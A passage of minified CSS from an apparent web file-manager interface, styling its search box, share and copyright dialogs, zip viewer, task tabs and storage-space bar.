.content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header .s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid #1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content .header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode .menu-item-parent{display:block;color:#fff;}.support-space-not .share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left #folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content 